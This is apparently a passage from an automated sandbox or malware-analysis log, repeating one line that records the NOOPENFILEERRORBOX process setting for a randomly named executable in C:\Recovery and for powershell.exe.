                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
